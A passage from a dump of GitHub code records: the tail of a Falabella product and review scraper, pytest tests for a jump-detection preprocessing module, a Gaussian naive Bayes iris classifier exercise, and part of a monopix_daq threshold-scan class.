{}'.format(category_id))\n break\n\n for result in res['results']:\n product_url = result['url']\n # Remove weird special characters\n product_url = product_url.encode(\n 'ascii', 'ignore').decode('ascii')\n\n if '?' in product_url:\n product_url = '{}/{}'.format(product_url.split('?')\n [0], result['skuId'])\n\n if product_url not in discovered_urls:\n discovered_urls.append(product_url)\n\n page += 1\n\n return discovered_urls\n\n @classmethod\n def retrieve_json_page(cls, session, url, retries=5):\n if '?' in url:\n separator = '&'\n else:\n separator = '?'\n\n modified_url = '{}{}v={}'.format(url, separator, random.random())\n\n try:\n res = session.get(modified_url, timeout=30)\n return json.loads(res.content.decode('utf-8'))['data']\n except Exception:\n if retries > 0:\n time.sleep(3)\n return cls.retrieve_json_page(session, url, retries=retries-1)\n else:\n raise\n\n @classmethod\n def _products_for_url(\n cls, url, content, session, category=None, extra_args=None):\n soup = BeautifulSoup(content, 'html.parser')\n next_container = soup.find('script', {'id': '__NEXT_DATA__'})\n\n if not next_container:\n return []\n\n product_data = json.loads(\n next_container.text)[\n 'props']['pageProps']['productData']\n\n specification_tag = soup.find('div', 'productInfoContainer')\n long_description = product_data['longDescription']\n\n if long_description:\n description_soup = BeautifulSoup(\n unescape(long_description), 'html.parser')\n else:\n description_soup = None\n\n panels = [specification_tag, description_soup]\n video_urls = []\n description = ''\n\n for panel in panels:\n if not panel:\n continue\n\n description += html_to_markdown(str(panel))\n\n for iframe in panel.findAll('iframe'):\n if 'src' not in iframe.attrs:\n continue\n\n match = re.search(\n r'//www.youtube.com/embed/(.+)\\?', iframe['src'])\n if not match:\n match = re.search(\n r'//www.youtube.com/embed/(.+)', iframe['src'])\n if match:\n video_url = 'https://www.youtube.com/watch?v={}'.format(\n match.groups()[0].strip())\n if validators.url(video_url):\n video_urls.append(video_url)\n\n slug = product_data['slug']\n publication_id = product_data['id']\n brand = product_data['brandName'] or 'Genérico'\n base_name = '{} {}'.format(brand, product_data['name'])\n # Remove weird unicode characters\n base_name = base_name.encode('ascii', 'ignore').decode('ascii')\n\n products = []\n\n if 'variants' not in product_data:\n return []\n\n reviews_url = 'https://api.bazaarvoice.com/data/display/' \\\n '0.2alpha/product/summary?PassKey=' \\\n 'm8bzx1s49996pkz12xvk6gh2e&productid={}&' \\\n 'contentType=reviews,questions&' \\\n 'reviewDistribution=primaryRating,' \\\n 'recommended&rev=0'.format(product_data['id'])\n\n review_data = json.loads(session.get(reviews_url, timeout=30).text)\n review_count = review_data['reviewSummary']['numReviews']\n review_avg_score = review_data['reviewSummary']['primaryRating'][\n 'average']\n\n is_international_shipping = product_data[\n 'internationalShipping']['applicable']\n\n for model in product_data['variants']:\n sku = model['id']\n sku_url = 'https://www.falabella.com/falabella-cl/product/{}/{}/' \\\n '{}'.format(publication_id, slug, sku)\n\n prices = {e['type']: e for e in model['prices']}\n\n if not prices:\n continue\n\n normal_price_keys = ['eventPrice', 'internetPrice', 'normalPrice']\n offer_price_keys = ['cmrPrice', 'eventPrice']\n\n normal_price = None\n offer_price = None\n\n for key in normal_price_keys:\n if key not in prices:\n continue\n normal_price = Decimal(remove_words(prices[key]['price'][0]))\n if normal_price.is_finite():\n break\n else:\n normal_price = None\n\n for key in offer_price_keys:\n if key not in prices:\n continue\n offer_price = Decimal(remove_words(prices[key]['price'][0]))\n if offer_price.is_finite():\n break\n else:\n offer_price = None\n\n if not normal_price and not offer_price:\n # No valid prices found\n continue\n\n if not offer_price:\n offer_price = normal_price\n\n if not normal_price:\n normal_price = offer_price\n\n if normal_price == Decimal('9999999') or \\\n offer_price == Decimal('9999999'):\n continue\n\n seller_entry = None\n\n if model['offerings'] and 'sellerName' in model['offerings'][0]:\n if 'falabella' not in \\\n model['offerings'][0]['sellerName'].lower():\n seller_entry = model['offerings'][0]\n elif model['offerings'] and 'sellerId' in model['offerings'][0]:\n if 'falabella' not in \\\n model['offerings'][0]['sellerId'].lower():\n seller_entry = model['offerings'][0]\n\n stock = 0\n\n if seller_entry:\n seller = seller_entry.get('sellerName',\n seller_entry['sellerId']) or None\n\n if is_international_shipping:\n stock = 0\n elif seller in cls.seller_blacklist:\n stock = 0\n else:\n if seller_entry.get('sellerProductStatus', None) == \\\n 'ACTIVO' or seller_entry.get('isActive', False):\n stock = -1\n else:\n stock = 0\n else:\n seller = None\n if not is_international_shipping and \\\n model.get('isPurchaseable', True):\n availabilities = model['availability']\n\n for availability in availabilities:\n if availability['shippingOptionType'] in \\\n ['All', 'HomeDelivery', 'SiteToStore',\n 'PickupInStore']:\n if availability['quantity']:\n stock = -1\n break\n else:\n stock = 0\n\n if 'reacondicionado' in base_name.lower():\n condition = 'https://schema.org/RefurbishedCondition'\n elif 'reacondicionado' in description.lower():\n condition = 'https://schema.org/RefurbishedCondition'\n else:\n condition = 'https://schema.org/NewCondition'\n\n picture_urls = [x['url'] + '?scl=1.0' for x in model['medias'] if validators.url(x['url'])]\n model_name = model['name'].encode(\n 'ascii', 'ignore').decode('ascii')\n\n p = Product(\n '{} ({})'.format(base_name, model_name)[:200],\n cls.__name__,\n category,\n sku_url,\n url,\n sku,\n stock,\n normal_price,\n offer_price,\n 'CLP',\n sku=sku,\n picture_urls=picture_urls,\n video_urls=video_urls,\n review_count=review_count,\n review_avg_score=review_avg_score,\n condition=condition,\n seller=seller,\n description=description\n )\n\n products.append(p)\n\n return products\n\n @classmethod\n def banners(cls, extra_args=None):\n base_url = 'https://www.falabella.com/falabella-cl/{}'\n\n sections_data = [\n [bs.HOME, 'Home', bs.SUBSECTION_TYPE_HOME, ''],\n\n # # CATEGORY PAGES # #\n [bs.REFRIGERATION, 'Electrohogar-Refrigeradores',\n bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n 'category/cat3205/Refrigeradores?isLanding=true'],\n # [bs.WASHING_MACHINES, 'Electrohogar-Lavado',\n # bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n # 'category/cat3136/Lavado?isLanding=true'],\n # [bs.TELEVISIONS, 'TV', bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n # 'category/cat1012/TV?isLanding=true'],\n [bs.AUDIO, 'Audio', bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n 'category/cat2005/Audio?isLanding=true'],\n [bs.CELLS, 'Telefonía-Celulares y Teléfonos',\n bs.SUBSECTION_TYPE_CATEGORY_PAGE,\n 'category/cat2018/Celulares-y-Telefonos?isLanding=true'],\n\n # # MOSAICS ##\n [bs.LINEA_BLANCA_FALABELLA, 'Electro y Tecnología-Línea Blanca',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat7090035/Linea-Blanca?isPLP=1'],\n [bs.REFRIGERATION, 'Refrigeradores-No Frost',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4074/No-Frost'],\n [bs.REFRIGERATION, 'Refrigeradores-Side by Side',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4091/Side-by-Side'],\n [bs.WASHING_MACHINES, 'Lavadoras', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3136/Lavadoras'],\n [bs.WASHING_MACHINES, 'Lavadoras-Lavadoras',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4060/Lavadoras'],\n [bs.WASHING_MACHINES, 'Lavadoras-Lavadoras-Secadoras',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat1700002/Lavadoras-Secadoras'],\n [bs.WASHING_MACHINES, 'Lavadoras-Secadoras',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat4088/Secadoras'],\n [bs.WASHING_MACHINES, ' Lavadoras-Lavadoras Doble Carga',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11400002/Lavadoras-Doble-Carga'],\n [bs.TELEVISIONS, 'Tecnología-TV', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat1012/TV?isPLP=1'],\n [bs.TELEVISIONS, 'Televisores LED', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat7190148/Televisores-LED'],\n [bs.TELEVISIONS, 'LEDs menores a 50 pulgadas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11161614/LEDs-menores-a-50-pulgadas'],\n [bs.TELEVISIONS, 'LEDs entre 50 - 55 pulgadas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11161675/LEDs-entre-50---55-pulgadas'],\n [bs.TELEVISIONS, 'LEDs sobre 55 pulgadas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat11161679/LEDs-sobre-55-pulgadas'],\n [bs.TELEVISIONS, 'TV-LED', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat2850014/LED'],\n [bs.TELEVISIONS, 'TV-Smart TV', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3040054/Smart-TV'],\n [bs.TELEVISIONS, 'TV-4K UHD', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3990038/4K-UHD'],\n [bs.TELEVISIONS, 'TV-Televisores OLED', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat2850016/Televisores-OLED'],\n [bs.TELEVISIONS, 'TV-Pulgadas Altas',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat12910024/Televisores-LED-Desde-65\"'],\n [bs.AUDIO, 'Audio-Soundbar y Home Theater',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat2045/Home-Theater'],\n [bs.AUDIO, 'Home Theater', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3050040/Home-Theater'],\n [bs.AUDIO, 'Soundbar', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat1700004/Soundbar'],\n [bs.AUDIO, 'Minicomponente', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat70018/Minicomponente'],\n [bs.AUDIO, 'Audio-Equipos de Música y Karaokes',\n bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3091/?mkid=CA_P2_MIO1_024794'],\n [bs.AUDIO, 'Audio-Hi-Fi', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat3203/Hi-Fi'],\n [bs.AUDIO, 'Audio', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat2005/Audio?isPLP=1'],\n [bs.CELLS, 'Smartphones', bs.SUBSECTION_TYPE_MOSAIC,\n 'category/cat720161/Smartphones'],\n [bs.CELLS, 'Electro y Tecnología-Teléfonos',\n bs.SUBSECTION_TYPE_MOSAIC, 'category/cat2018/Telefonos?isPLP=1'],\n ]\n\n banners = []\n\n for section, subsection, subsection_type, url_suffix in sections_data:\n url = base_url.format(url_suffix)\n print(url)\n\n if subsection_type == bs.SUBSECTION_TYPE_HOME:\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS[\n 'User-Agent']\n soup = BeautifulSoup(session.get(url, timeout=30).text,\n 'html.parser')\n next_data = json.loads(soup.find(\n 'script', {'id': '__NEXT_DATA__'}).text)\n\n for container in \\\n next_data['props']['pageProps']['page']['containers']:\n if container['key'] == 'showcase':\n showcase_container = container\n break\n else:\n raise Exception('No showcase container found')\n\n slides = showcase_container['components'][1]['data']['slides']\n\n for idx, slide in enumerate(slides):\n main_url = slide.get('mainUrl', None)\n if main_url:\n destination_urls = [main_url]\n elif slide['type'] == 'background_image_only':\n destination_urls = []\n else:\n destination_urls = list(\n {slide['urlLeft'], slide['urlRight']})\n picture_url = slide['imgBackgroundDesktopUrl']\n\n banners.append({\n 'url': url,\n 'picture_url': picture_url,\n 'destination_urls': destination_urls,\n 'key': picture_url,\n 'position': idx + 1,\n 'section': section,\n 'subsection': subsection,\n 'type': subsection_type\n })\n elif subsection_type == bs.SUBSECTION_TYPE_CATEGORY_PAGE:\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS[\n 'User-Agent']\n soup = BeautifulSoup(session.get(url, timeout=30).text,\n 'html.parser')\n next_data = json.loads(soup.find(\n 'script', {'id': '__NEXT_DATA__'}).text)\n\n for container in \\\n next_data['props']['pageProps']['page']['containers']:\n if container['key'] == 'main-right':\n showcase_container = container\n break\n else:\n raise Exception('No showcase container found')\n\n slides = showcase_container['components'][0]['data']['slides']\n\n for idx, slide in enumerate(slides):\n main_url = slide.get('mainUrl', None)\n if main_url:\n destination_urls = [main_url]\n elif slide['type'] == 'background_image_only':\n destination_urls = []\n else:\n destination_urls = list(\n {slide['urlLeft'], slide['urlRight']})\n picture_url = slide['imgBackgroundDesktopUrl']\n\n banners.append({\n 'url': url,\n 'picture_url': picture_url,\n 'destination_urls': destination_urls,\n 'key': picture_url,\n 'position': idx + 1,\n 'section': section,\n 'subsection': subsection,\n 'type': subsection_type\n })\n elif subsection_type == bs.SUBSECTION_TYPE_MOSAIC:\n session = session_with_proxy(extra_args)\n session.headers['User-Agent'] = CF_REQUEST_HEADERS[\n 'User-Agent']\n soup = BeautifulSoup(session.get(url).text, 'html.parser')\n banner = soup.find('div', 'fb-huincha-main-wrap')\n\n if not banner:\n print('No banner for ' + url)\n continue\n\n image_url = banner.find('source')['srcset']\n dest_url = banner.find('a')['href']\n\n banners.append({\n 'url': url,\n 'picture_url': image_url,\n 'destination_urls': [dest_url],\n 'key': image_url,\n 'position': 1,\n 'section': section,\n 'subsection': subsection,\n 'type': subsection_type})\n\n return banners\n\n @classmethod\n def _get_picture_urls(cls, session, product_id):\n pictures_resource_url = 'https://falabella.scene7.com/is/image/' \\\n 'Falabella/{}?req=set,json'.format(product_id)\n pictures_response = session.get(pictures_resource_url, timeout=30).text\n pictures_json = json.loads(\n re.search(r's7jsonResponse\\((.+),\"\"\\);',\n pictures_response).groups()[0])\n\n picture_urls = []\n\n picture_entries = pictures_json['set']['item']\n if not isinstance(picture_entries, list):\n picture_entries = [picture_entries]\n\n for picture_entry in picture_entries:\n picture_url = 'https://falabella.scene7.com/is/image/{}?' \\\n 'wid=1500&hei=1500&qlt=70'.format(\n picture_entry['i']['n'])\n picture_urls.append(picture_url)\n\n return picture_urls\n\n @classmethod\n def reviews_for_sku(cls, sku):\n print(sku)\n session = session_with_proxy(None)\n reviews = []\n offset = 0\n\n while True:\n print(offset)\n endpoint = 'https://api.bazaarvoice.com/data/batch.json?' \\\n 'passkey=m8bzx1s49996pkz12xvk6gh2e&apiversion=' \\\n '5.5&resource.q0=reviews&filter.q0=isratings' \\\n 'only%3Aeq%3Afalse&filter.q0=productid%3Aeq' \\\n '%3A{}&limit.q0=100&offset.q0={}'.format(sku, offset)\n response = session.get(endpoint).json()[\n 'BatchedResults']['q0']['Results']\n\n if not response:\n break\n\n for entry in response:\n review_date = parse(entry['SubmissionTime'])\n\n review = {\n 'store': 'Falabella',\n 'sku': sku,\n 'rating': float(entry['Rating']),\n 'text': entry['ReviewText'],\n 'date': review_date.isoformat()\n }\n\n reviews.append(review)\n\n offset += 100\n\n return reviews\n","repo_name":"SoloTodo/storescraper","sub_path":"storescraper/stores/falabella.py","file_name":"falabella.py","file_ext":"py","file_size_in_byte":34132,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"69"}
+{"seq_id":"70509587099","text":"from typing import Tuple\n\nimport hypothesis.strategies as st\nimport numpy as np\nimport pytest\nfrom athology_ml.ml.jump_detection import preprocessing\nfrom hypothesis import given\nfrom hypothesis.extra import numpy\nfrom tensorflow.data import Dataset\nfrom tensorflow.keras.layers.experimental.preprocessing import Normalization\n\n\ndef test_pack_features_vector_correct_shape(\n dummy_jump_detection_dataset: Tuple[Dataset, Dataset, Dataset]\n) -> None:\n \"\"\"Sanity check that feature and label vector packing produce tensors of the correct shape.\"\"\"\n train_dataset, _, _ = dummy_jump_detection_dataset\n train_dataset = train_dataset.map(preprocessing.pack_features_vector)\n num_features = 3\n for features, labels in train_dataset.as_numpy_iterator():\n assert features.shape == (num_features,)\n assert labels.shape == (1,)\n\n\ndef test_get_features_and_labels(\n dummy_jump_detection_dataset: Tuple[Dataset, Dataset, Dataset]\n) -> None:\n \"\"\"Sanity check that get_features_and_labels returns tensors of the correct shape.\"\"\"\n train_dataset, _, _ = dummy_jump_detection_dataset\n # get_features_and_labels expects pack_features_vector to have been called\n train_dataset = train_dataset.map(preprocessing.pack_features_vector)\n num_rows, num_features = 100, 3\n all_features, all_labels = preprocessing.get_features_and_labels(\n dataset=train_dataset, num_rows=num_rows\n )\n assert all_features.shape == (num_rows, num_features)\n assert all_labels.shape == (num_rows,)\n\n\n@given(\n numpy.arrays(\n np.dtype(\"bool\"),\n shape=st.tuples(\n st.integers(min_value=0, max_value=16), st.integers(min_value=0, max_value=16)\n ),\n )\n)\ndef test_get_classifier_bias_init(labels: np.ndarray) -> None:\n \"\"\"Tests get_classifier_bias_init over a grid of random, two-dimensional bool arrays.\"\"\"\n pos = labels.sum()\n neg = labels.size - pos\n\n # Assert that a ValueError is raised if labels is an empty array.\n if not labels.size:\n with pytest.raises(ValueError):\n _ = preprocessing.get_classifier_bias_init(labels)\n else:\n actual = preprocessing.get_classifier_bias_init(labels)\n # If there is at least one positive and one negative, we should be returning\n # the log ratio of the support. Otherwise we should be returning None.\n if pos > 0 and neg > 0:\n expected = np.log(pos / neg)\n else:\n expected = None\n\n assert actual == expected\n\n\ndef test_get_normalizer() -> None:\n \"\"\"Sanity check that the normalization layer can be created with some valid training data.\"\"\"\n # batch_size and timesteps are tuneable. Here we use similar values as used during training.\n # input_dim and output_dim are decided by the data and the feature_extractor layer respectively.\n batch_size, timesteps, input_dim, output_dim = 1, 128, 3, 5\n\n features = np.random.rand(batch_size, timesteps, input_dim)\n sum_ = np.sum(features, axis=-1, keepdims=True)\n norm = np.linalg.norm(features, axis=-1, keepdims=True)\n inputs = np.concatenate((features, sum_, norm), axis=-1)\n\n normalizer = preprocessing.get_normalizer(features)\n assert isinstance(normalizer, Normalization)\n outputs = normalizer(inputs).numpy()\n assert outputs.shape == (batch_size, timesteps, output_dim)\n\n\ndef test_get_normalizer_value_error() -> None:\n \"\"\"Check that the get_normalizer will return a ValueError for bad data.\"\"\"\n # batch_size and timesteps are tuneable. Here we use similar values as used during training.\n # input_dim and output_dim are decided by the data and the feature_extractor layer respectively.\n batch_size, timesteps, input_dim = 1, 128, 3\n\n features = np.random.rand(0, timesteps, input_dim)\n with pytest.raises(ValueError):\n _ = preprocessing.get_normalizer(features)\n\n features = np.random.rand(batch_size, 0, input_dim)\n with pytest.raises(ValueError):\n _ = preprocessing.get_normalizer(features)\n","repo_name":"dcsil/athology-ml","sub_path":"tests/ml/jump_detection/test_preprocessing.py","file_name":"test_preprocessing.py","file_ext":"py","file_size_in_byte":4013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"2051689053","text":"\"\"\"\nAutor: GAÑAN, Tomas // CERIONI, Enrique \nEjercicio 9b: Flores (Gaussiano)\n\"\"\"\n\n# Importacion de librerias/modulos\n\nimport numpy as np\nimport random\nimport math\nimport statistics as stats\n\n# Funcion Calculo Gauss\n\ndef calculoGauss(med,var,x):\n den = var * math.sqrt(2*math.pi)\n miem = pow(math.e,-0.5*pow((x-med)/var,2))\n gauss = (1/den)*miem\n \n return gauss\n\n# Funcion Evaluacion\n\ndef evaluar(prob1,prob2,prob3):\n valueMax = max(prob1,prob2,prob3)\n if(valueMax == prob1):\n print(\"Se clasifica como: SETOSA - El valor máximo es: \",valueMax)\n elif(valueMax == prob2):\n print(\"Se clasifica como: VERSICOLOR - El valor máximo es: \",valueMax)\n else:\n print(\"Se clasifica como: VIRGINICA - El valor máximo es: \",valueMax)\n \n# Desarrollo\n\nfileName = open('iris.txt','r')\n\ndata = []\n\nfor i in fileName.readlines(): \n lista = i.split(',') \n flores = []\n for item in lista:\n if not item.startswith('Iris'):\n item = float(item)\n else:\n item = item.rstrip('\\n')\n flores.append(item)\n data.append(flores)\t\n\nirisSetosa = 0\nirisVersi = 0\nirisVergi = 0\n\nfor j in range(150):\n if(data[j][4] == 'Iris-setosa'):\n irisSetosa += 1\n elif(data[j][4] == 'Iris-versicolor'):\n irisVersi += 1\n else:\n irisVergi += 1\n \n# Probabilidades generales\n\nprobSetosa = round(irisSetosa/len(data),2)\nprobVersi = round(irisVersi/len(data),2)\nprobVergi = round(irisVergi/len(data),2)\n\n# Contadores\n\nlongitudCepalSetosa = []\nanchoCepalSetosa = []\nlongitudPetaloSetosa = []\nanchoPetaloSetosa = []\n\nlongitudCepalVersi = []\nanchoCepalVersi = []\nlongitudPetaloVersi = []\nanchoPetaloVersi = []\n\nlongitudCepalVergi = []\nanchoCepalVergi = []\nlongitudPetaloVergi = []\nanchoPetaloVergi = []\n\nfor j in range(150):\n if(data[j][4] == 'Iris-setosa'):\n longitudCepalSetosa.append(data[j][0])\n anchoCepalSetosa.append(data[j][1])\n longitudPetaloSetosa.append(data[j][2])\n anchoPetaloSetosa.append(data[j][3])\n elif(data[j][4] == 'Iris-versicolor'):\n longitudCepalVersi.append(data[j][0])\n anchoCepalVersi.append(data[j][1])\n longitudPetaloVersi.append(data[j][2])\n anchoPetaloVersi.append(data[j][3])\n elif(data[j][4] == 'Iris-virginica'):\n longitudCepalVergi.append(data[j][0])\n anchoCepalVergi.append(data[j][1])\n longitudPetaloVergi.append(data[j][2])\n anchoPetaloVergi.append(data[j][3])\n \n# Media y varianza para la Longitud Cepal\n\nmedLongCepalSetosa = np.mean(longitudCepalSetosa)\nmedLongCepalVersi = np.mean(longitudCepalVersi)\nmedLongCepalVergi = np.mean(longitudCepalVergi)\n\nvarLongCepalSetosa = np.var(longitudCepalSetosa)\nvarLongCepalVersi = np.var(longitudCepalVersi)\nvarLongCepalVergi = np.var(longitudCepalVergi)\n\n# Media y varianza para la Ancho Cepal\n\nmedAnchoCepalSetosa = np.mean(anchoCepalSetosa)\nmedAnchoCepalVersi = np.mean(anchoCepalVersi)\nmedAnchoCepalVergi = np.mean(anchoCepalVergi)\n\nvarAnchoCepalSetosa = np.var(anchoCepalSetosa)\nvarAnchoCepalVersi = np.var(anchoCepalVersi)\nvarAnchoCepalVergi = np.var(anchoCepalVergi)\n\n# Media y varianza para la Longitud Petalo\n\nmedLongPetalSetosa = np.mean(longitudPetaloSetosa)\nmedLongPetalVersi = np.mean(longitudPetaloVersi)\nmedLongPetalVergi = np.mean(longitudPetaloVergi)\n\nvarLongPetalSetosa = np.var(longitudPetaloSetosa)\nvarLongPetalVersi = np.var(longitudPetaloVersi)\nvarLongPetalVergi = np.var(longitudPetaloVergi)\n\n# Media y varianza para la Ancho Petalo\n\nmedAnchoPetalSetosa = np.mean(anchoPetaloSetosa)\nmedAnchoPetalVersi = np.mean(anchoPetaloVersi)\nmedAnchoPetalVergi = np.mean(anchoPetaloVergi)\n\nvarAnchoPetalSetosa = np.var(anchoPetaloSetosa)\nvarAnchoPetalVersi = np.var(anchoPetaloVersi)\nvarAnchoPetalVergi = np.var(anchoPetaloVergi)\n\n\"\"\"\n---> 5.3, 4.0, 1.6, 0.3\n---> 5.0, 2.1, 4.6, 1.2\n---> 6.9, 4.1, 2.6, 1.4\n\"\"\"\n\n# Probabilidad a posteriori para cada clase\n\n# Ejemplo 1\n\nprobTotSetosa1 = probSetosa * calculoGauss(medLongCepalSetosa,varLongCepalSetosa,5.3) * calculoGauss(medAnchoCepalSetosa, varAnchoCepalSetosa,4.0) * calculoGauss(medLongPetalSetosa,varLongPetalSetosa,1.6) * calculoGauss(medAnchoPetalSetosa,varAnchoPetalSetosa,0.3)\nprobTotVersi1 = probVersi * calculoGauss(medLongCepalVersi,varLongCepalVersi,5.3) * calculoGauss(medAnchoCepalVersi,varAnchoCepalVersi,4.0) * calculoGauss(medLongPetalVersi,varLongPetalVersi,1.6) * calculoGauss(medAnchoPetalVersi,varAnchoPetalVersi,0.3)\nprobTotVergi1 = probVergi * calculoGauss(medLongCepalVergi,varLongCepalVergi,5.3) * calculoGauss(medAnchoCepalVergi,varAnchoCepalVergi,4.0) * calculoGauss(medLongPetalVergi,varLongPetalVergi,1.6) * calculoGauss(medAnchoPetalVergi, varAnchoPetalVergi,0.3)\n\n# Ejemplo 2\n\nprobTotSetosa2 = probSetosa * calculoGauss(medLongCepalSetosa,varLongCepalSetosa,5.0) * calculoGauss(medAnchoCepalSetosa, varAnchoCepalSetosa,2.1) * calculoGauss(medLongPetalSetosa,varLongPetalSetosa,4.6) * calculoGauss(medAnchoPetalSetosa,varAnchoPetalSetosa,1.2)\nprobTotVersi2 = probVersi * calculoGauss(medLongCepalVersi,varLongCepalVersi,5.0) * calculoGauss(medAnchoCepalVersi,varAnchoCepalVersi,2.1) * calculoGauss(medLongPetalVersi,varLongPetalVersi,4.6) * calculoGauss(medAnchoPetalVersi,varAnchoPetalVersi,1.2)\nprobTotVergi2 = probVergi * calculoGauss(medLongCepalVergi,varLongCepalVergi,5.0) * calculoGauss(medAnchoCepalVergi,varAnchoCepalVergi,2.1) * calculoGauss(medLongPetalVergi,varLongPetalVergi,4.6) * calculoGauss(medAnchoPetalVergi, varAnchoPetalVergi,1.2)\n\n# Ejemplo 3\n\nprobTotSetosa3 = probSetosa * calculoGauss(medLongCepalSetosa,varLongCepalSetosa,6.9) * calculoGauss(medAnchoCepalSetosa, varAnchoCepalSetosa,4.1) * calculoGauss(medLongPetalSetosa,varLongPetalSetosa,2.6) * calculoGauss(medAnchoPetalSetosa,varAnchoPetalSetosa,1.4)\nprobTotVersi3 = probVersi * calculoGauss(medLongCepalVersi,varLongCepalVersi,6.9) * calculoGauss(medAnchoCepalVersi,varAnchoCepalVersi,4.1) * calculoGauss(medLongPetalVersi,varLongPetalVersi,2.6) * calculoGauss(medAnchoPetalVersi,varAnchoPetalVersi,1.4)\nprobTotVergi3 = probVergi * calculoGauss(medLongCepalVergi,varLongCepalVergi,6.9) * calculoGauss(medAnchoCepalVergi,varAnchoCepalVergi,4.1) * calculoGauss(medLongPetalVergi,varLongPetalVergi,2.6) * calculoGauss(medAnchoPetalVergi, varAnchoPetalVergi,1.4)\n\nevaluar(probTotSetosa1,probTotVersi1,probTotVergi1)\nevaluar(probTotSetosa2,probTotVersi2,probTotVergi2)\nevaluar(probTotSetosa3,probTotVersi3,probTotVergi3)","repo_name":"enriquecerioni/IA-2019","sub_path":"TP N°9/ej9b.py","file_name":"ej9b.py","file_ext":"py","file_size_in_byte":6458,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28217405078","text":"import os,sys,time\n\nimport numpy as np\nimport bitarray\nimport tables as tb\nimport logging\nimport yaml\n\nimport monopix_daq.scans.injection_scan as injection_scan\nimport monopix_daq.analysis.utils \nINJCAP=2.7E-15\n\nlocal_configuration={\"injlist\": np.arange(0.005,0.6,0.005),\n 'pix': [18,25], \n 'n_mask_pix': 23, #A list of pixels to go through\n \"disable_noninjected_pixel\":True,\n \"with_mon\": False\n}\n\nclass ThScan(injection_scan.InjectionScan):\n scan_id = \"th_scan\"\n \n def scan(self,**kwargs):\n \"\"\"\n pix: list of pixels \n injlist: array of injection voltage to scan (inj_high-inj_low)\n n_mask_pix: number of pixels which injected at once.\n Other configuration must be configured before scan.start()\n \"\"\"\n kwargs[\"pix\"]=kwargs.pop(\"pix\",local_configuration['pix'])\n\n kwargs[\"thlist\"]=None\n kwargs[\"injlist\"]=kwargs.pop(\"injlist\",local_configuration['injlist'])\n kwargs[\"phaselist\"]=None\n\n kwargs[\"n_mask_pix\"]=kwargs.pop(\"n_mask_pix\",local_configuration['n_mask_pix'])\n kwargs[\"disable_noninjected_pixel\"]=kwargs.pop(\"disable_noninjected_pixel\",local_configuration['disable_noninjected_pixel'])\n kwargs[\"with_mon\"]=kwargs.pop(\"with_mon\",local_configuration['with_mon'])\n super(ThScan, self).scan(**kwargs)\n\n def analyze(self):\n fraw = self.output_filename +'.h5'\n fhit=fraw[:-7]+'hit.h5'\n fev=fraw[:-7]+'ev.h5'\n \n super(ThScan, self).analyze()\n\n import monopix_daq.analysis.analyze_cnts as analyze_cnts\n ana=analyze_cnts.AnalyzeCnts(fev,fraw)\n ana.init_scurve()\n ana.init_scurve_fit()\n ana.init_th_dist()\n ana.init_noise_dist()\n ana.run()\n \n def plot(self, save_png=False, pixel_scurve=False, perflavour=True):\n fev=self.output_filename[:-4]+'ev.h5'\n fraw = self.output_filename +'.h5'\n fpdf = self.output_filename +'.pdf'\n\n import monopix_daq.analysis.plotting_base as plotting_base\n with plotting_base.PlottingBase(fpdf,save_png=save_png) as plotting:\n with tb.open_file(fraw) as f:\n firmware=yaml.load(f.root.meta_data.attrs.firmware)\n inj_n=firmware[\"inj\"][\"REPEAT\"]\n ## DAC Configuration page\n dat=yaml.load(f.root.meta_data.attrs.dac_status)\n dat.update(yaml.load(f.root.meta_data.attrs.power_status))\n dat[\"inj_n\"]=inj_n\n dat[\"inj_delay\"]=firmware[\"inj\"][\"DELAY\"]\n dat[\"inj_width\"]=firmware[\"inj\"][\"WIDTH\"]\n global_th = dat[\"TH[V]\"]\n plotting.table_1value(dat,page_title=\"Chip configuration\")\n\n dat=yaml.load(f.root.meta_data.attrs.pixel_conf)\n with tb.open_file(fev) as f:\n ## Pixel configuration page\n injected=f.root.Injected[:]\n plotting.plot_2d_pixel_4(\n [injected,injected,dat[\"MONITOR_EN\"],dat[\"TRIM_EN\"]],\n page_title=\"Pixel configuration\",\n title=[\"Preamp\",\"Inj\",\"Mon\",\"TDAC\"], \n z_min=[0,0,0,0], z_max=[1,1,1,15])\n\n ## Scurve\n for i in range(len(f.root.Scurve)):\n dat=f.root.Scurve[i][\"scurve\"]\n xbins=f.root.Scurve.attrs.xbins\n ybins=f.root.Scurve.attrs.ybins\n plotting.plot_2d_hist(dat,\n bins=[xbins,ybins],\n title=f.root.Scurve.title,\n z_axis_title=\"\",z_min=1,z_max=\"maximum\",z_scale=\"log\")\n\n ## Threshold 